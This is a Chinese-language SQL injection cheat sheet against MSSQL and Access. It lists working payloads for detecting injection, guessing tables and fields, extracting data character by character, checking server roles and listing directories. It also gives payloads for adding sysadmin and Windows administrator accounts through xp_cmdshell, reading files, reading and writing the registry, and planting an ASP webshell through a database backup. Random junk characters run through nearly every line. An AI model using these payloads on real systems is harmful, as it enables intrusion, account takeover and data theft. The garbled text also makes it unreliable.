1.判断是否有注入;and 1=1 ;and 1=2 ��H"2,Q�
T
2.初步判断是否是mssql ;and user>0 q93V�'[�)F
EVbD�I yFn
3.注入参数是字符'and [查询条件] and ''=' >>�=v�`�}�
z_z�'3d.r7
4.搜索时没过滤参数的'and [查询条件] and '%25'=' q#Ik3 5���
m :�]F�&s�
5.判断数据库系统 Qk�O�4Td<�
7G���_lGV_
;and (select count(*) from sysobjects)>0 mssql Aca��?C���
{Z[kvXf"mZ
;and (select count(*) from msysobjects)>0 access ):�Ekf�2��
`k0�8�M)�
RW���n#"�~
MpJx>�0j/J
6.猜数据库 ;and (select Count(*) from [数据库名])>0 r1$�x}I#Zv
�?
�5h�wz
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 bH��H�R^*B
x�1:1�Jj:
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 ��m(�WVxVB
=E8K�ac�u%
9.(1)猜字段的ascii值(access) `"bp���-/
[�{�_K[�5i
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 1�+�Y;
"tT
�8ZO~�=e��
(2)猜字段的ascii值(mssql) Z��?w�=�-�
UX'td�B
!A
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 E95V�R?nUg
?Y�e��%k��
10.测试权限结构(mssql) W�F��<*rl�
+Nka,�C^O"
�sM%.=�~AN
c�ACnBg�Ll
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- zU�};�|Zw�
�=iPQ\_ON@
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));--
2f��-Or/v
cuQ=b�R�Ib
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- z�.kB�Q{P
%M0�5�& �<
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- {|@N~c+���
�>[g'��i+{
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- n���iM(0p�
t]pJ��t��
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- :�Sp��P��T
�d _ko�F-7
;and 1=(select IS_MEMBER('db_owner'));-- S�CM��Z-^b
`3�F/7$q_�
�;V�1e�>?3
�)�i>T�\B�
11.添加mssql和系统的帐户 rH�grC��MW
N" �oJ3-~�
;exec master.dbo.sp_addlogin username;-- D�zCb'#� �
;exec master.dbo.sp_password null,username,password;-- �ymyk.#Z<%
|n&EbO�mgf
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- ^kj�%�Ekt7
6�~q"#�94�
;exec master.dbo.xp_cmdshell 'net user username password H\e<�fi%�Q
�Qg���X[?2
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- �rkW�W)h(e
I~Z�m*�*L
;exec master.dbo.xp_cmdshell 'net user username password /add';-- BH=C���oD.
h'�G8@��j;
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- ��
'+C%]p�
-3:x(^|:K�
Y�cB�AW4B`
rx;�zd���?
12.(1)遍历目录 k�$�} 6Qd�
Z�sYT&��P2
;create table dirs(paths varchar(100), id int) x68s���$H�
�[p_C?�hHO
;insert dirs exec master.dbo.xp_dirtree 'c:\' (*Y��ENT�}
rhvsd2�z�i
;and (select top 1 paths from dirs)>0 N�
DV_/�BI
S>p>$m�,
Q
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) -^7�n+
Q�X
uc;QSVWGy8
_qq�J�>E<0
.c.#V:XZ#U
(2)遍历目录 ;rH@>Vr�R�
�pF�"IDC
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- |4a#O8���d
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 l����L:�J:
c^8y/w�fok
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 7e&%R4{��b
v<�Ux+��-�
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 [t`QV2�um�
[VP�~~*��b
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 ��3^zO�G2
%�@FT�g$
h�Y�N��b9^
ysiB�ru[u
13.mssql中的存储过程 Gw�kp�(�9d
vd��<�"
G}
xp_regenumvalues 注册表根键, 子键 Ws`P(WH�m�
,�*Y�u~�4
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 07+Qai�-�]
<kmn3�w,vi
xp_regread 根键,子键,键值名 w��~g)Dz2G
r��
yO\$m�
;exec xp_regread 6y9#���am?
F
'U� G��p
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 @YTZ��nGG*
Io&F0~Z;;(
xp_regwrite 根键,子键, 值名, 值类型, 值 �j7 �D��\O
zW^�@\kB0D
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 �NU��H���#
�9�_�GR\\�
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 cv["Ps#;`W
YX�_����p3
xp_regdeletevalue 根键,子键,值名 wy�$9��QN�
�l�H�^[�b[
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 Pw�'�3y�a8
.�gWYKZM
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 ��5�A�6d�]
PGHl:4`Es!
6��l>$N?�a
?J~(qa�a�;
14.mssql的backup创建webshell 7m=�t�u?@
HLU'1�As65
use model JQ8�wL _C>
�X}xy��
v�
create table cmd(str image); /���%U+kW�
a ^b�_�&}y
insert into cmd(str) values (''); ��!285=cxz
wvA�@\-.+�
backup database model to disk='c:\l.asp'; �kGMI���
?
7�P����Z0�
i9oi}�$;J
pVt8z|p_;{
15.mssql内置函数 �H�ay`lA2@
?t+Kp�9@aZ
;and (select @@version)>0 获得Windows的版本号 >_]j{}�~\k
��vd�9><W
;and user_name()='dbo' 判断当前系统的连接用户是不是sa /nRi19a%xU
�>T4.mB7+>
;and (select user_name())>0 爆当前系统的连接用户 ��snV,r��Z
�s�7<x~v+^
;and (select db_name())>0 得到当前连接的数据库 N$�H0o+9-Y
A�j�K'P<:/
g#1��_`�gK
969*��mcq'
16.简洁的webshell �_*+ 7*vAL
PK5�x�nT:
use model w7�]@�QT�C
�Z�!m0nx�
create table cmd(str image); D`LcL|nmH
,.�uPlnB�_
insert into cmd(str) values (''); 4�*_9Gl���
M����
yr [
backup database model to disk='g:\wwwtest\l.asp';
